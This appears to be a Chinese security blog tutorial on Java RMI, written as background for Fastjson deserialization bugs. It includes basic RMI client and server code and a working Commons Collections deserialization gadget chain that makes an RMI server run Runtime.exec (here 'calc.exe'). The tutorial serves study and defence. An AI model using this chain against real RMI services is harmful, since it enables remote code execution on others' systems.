位置:首页 > 安全分类 > WEB安全
反序列化RMI分析
简介前言在分析Fastjson漏洞前,需要了解RMI机制和JNDI注入等知识点,所以本篇文来分析一下RMI机制。在Java里面简单来说使用Java调用远程Java程序使用的就是RMI,调用C的程序调用的是
前言
在分析Fastjson漏洞前,需要了解RMI机制和JNDI注入等知识点,所以本篇文来分析一下RMI机制。
在Java里面简单来说使用Java调用远程Java程序使用的就是RMI,调用C的程序调用的是JNI,调用python程序使用到的是Jython。RMI、JNI、Jython,其实在安全中都能发挥比较大的作用。 JNI在安全里面的运用就比较大了,既然可以调用C语言,那么后面的… …自行脑补。这个暂且忽略不讲,后面再说。
如果使用或了解过Python编写burp的插件的话,对这个Jython也不会陌生,如果说Python的插件就需要安装一个Jython的jar包。这个后面再说。这里主要讲RMI,该机制会在反序列化中频繁运用,例如Weblogic的T3协议的反序列化漏洞。
概念
Rmi:远程方法调用, JRMP:Java远程消息交换协议。这是运行在Java RMI之下、TCP/IP之上的线路层协议。 该协议要求服务端与客户端都为Java编写,就像HTTP协议一样,规定了客户端和服务端通信要满足的规范。
JNDI :Java命名和目录接口(the Java naming and directory interface,JNDI)是一组在Java应用中访问命名和目录服务的API。命名服务将名称和对象联系起来,使得读者可以用名称访问对象。 目录服务是一种命名服务,在这种服务里,对象不但有名称,还有属性。
Rmi作用
Rmi为远程方法调用,是允许在一个java虚拟机的对象调用另一个java虚拟器的方法,这俩个虚拟机可以在一台计算机的不同进程中,也可在不同网络的计算机中
Rmi三个关键部分
Registry: 注册表,存放着远程对象的位置(ip,端口) client: 调用远程的对象 Server: 提供远程的对象
Rmi基础运用
前面说过RMI可以调用远程的一个java对象
package RmiStudyOne;
import RmiStudyOne.HelloInterface;
import java.rmi.NotBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class Client {
public static void main(String[] args) throws RemoteException, NotBoundException {
//获取远程主机对象
Registry registry = LocateRegistry.getRegistry("127.0.0.1",1099);
//利用注册表的代理去获取远程注册表中名为hello的对象
HelloInterface helloInterface = (HelloInterface) registry.lookup("test");
//调用远程方法
System.out.println(helloInterface.say("1234"));
}
}server代码
package RmiStudyOne;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
//注册远程对象
public class Server {
public static void main(String[] args) throws RemoteException, AlreadyBoundException {
//创建远程对象
HelloInterface helloservice = new HelloImpl();
//创建注册表
Registry registry = LocateRegistry.createRegistry(1099);
//绑定ip,默认是127.0.0.1
System.setProperty("java.rmi.server.hostname","127.0.0.1");
//绑定远程对象到注册表李,并且命名为Hello
registry.bind("test",helloservice);
}
}helloimpl
package RmiStudyOne;
import RmiStudyOne.HelloInterface;
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;
public class HelloImpl extends UnicastRemoteObject implements HelloInterface {
public HelloImpl() throws RemoteException {
super();
System.out.println("构造方法");
}
public String say(String name) throws RemoteException {
return "test"+name;
}
}hellointerface
package RmiStudyOne;
import java.rmi.Remote;
import java.rmi.RemoteException;
//创建接口,必须继承Remote
public interface HelloInterface extends Remote {
//每个函数必须抛出RemoteException异常
String say(String name) throws RemoteException;
}RMi触发反序列示例
Client
package RmiStudyTwo;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.util.HashMap;
import java.util.Map;
public class client {
public static void main(String[] args) throws Exception {
Registry registry = LocateRegistry.getRegistry("127.0.0.1",1099);
User user = (User)registry.lookup("user");
user.work(getpayload());
//另一种写法
// String url = "rmi://192.168.20.130:1099/user";
// User userClient = (User) Naming.lookup(url);
// userClient.work(getpayload());
}
public static Object getpayload() throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
};
Transformer transformerChain = new ChainedTransformer(transformers);
Map map = new HashMap();
map.put("value", "sijidou");
Map transformedMap = TransformedMap.decorate(map, null, transformerChain);
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Retention.class, transformedMap);
return instance;
}
}server
package RmiStudyTwo;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class Server {
public static void main(String[] args) throws RemoteException, AlreadyBoundException {
User user = new UserImpl();
Registry registry = LocateRegistry.createRegistry(1099);
registry.bind("user",user);
System.out.println("Rmi://127.0.0.1:1099");
}
}user
package RmiStudyTwo;
import java.rmi.Remote;
import java.rmi.RemoteException;
//远程接口类
public interface User extends Remote {
public String hello(String hello)throws RemoteException;
void work(Object object) throws RemoteException;
void say() throws RemoteException;
}
userimpl
package RmiStudyTwo;
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;
public class UserImpl extends UnicastRemoteObject implements User{
protected UserImpl() throws RemoteException {
super();
}
public String hello(String hello) throws RemoteException {
return "hello function";
}
public void work(Object object) throws RemoteException {
System.out.println("work方法被调用");
}
public void say() throws RemoteException {
System.out.println("say方法调用");
}
} 上一篇: tcpdump能进行丢包分析吗?
下一篇:威胁情报从哪里来到哪里去?
栏目导航
推荐资讯
- 解码API安全-挑战、威胁和最佳实践...
一、序言API为当今大多数数字体验提供了动力,API安全性仍然是大多数CXO最关心的问题。尽管数字化转型不断推... - 3大Web安全漏洞防御详解:XSS、CSRF、以及SQL注入解决方案...
随着互联网的普及,网络安全变得越来越重要。Java等程序员需要掌握基本的web安全知识,防患于未然,下面列举一些...
站长推荐
- 29岁转行转行网络安全是否值得呢?...
29岁转行网络安全,这个选择合适吗?在当今数字化时代,网络安全已成为一个越来越受到人们关注的领域。越来越多的... - 注意!你的网站可能已被DNS劫持:如何见招拆招?...
想象一下,你正准备在网上进行一次重要的银行转账,你打开了看似官方的网站,输入了你的账号和密码。然而,你并不知... - 2024年转行做网络安全工程师还来得及吗?薪资怎么样呢...
2022年以来,我国网络安全行业的市场规模持续增长,根据市场调研在线网发布的2023-2029年中国网络安全集成行业... - 2024年网络安全工程师的发展前景如何?红利还有吗?...
2021年7月12日工信部发布的《网络安全产业高质量发展三年行动计划(2021-2023年)》,文件中提出,2023年网络安全... - 学网络安全需要报名参加培训吗?如何选择培训机构?...
在云计算、大数据、工业互联网、物联网等行业快速发展所带来的下游客户的安全需求增长下,网络安全行业迎来了... - 网络安全行业人才缺口大吗?薪资怎么样?有哪些新兴岗位呢...
网络安全行业是当下非常热门的行业之一,其不仅具有较高的关注度,也是IT行业内热议的话题,尤其是在当下,不少人都...
官方微信
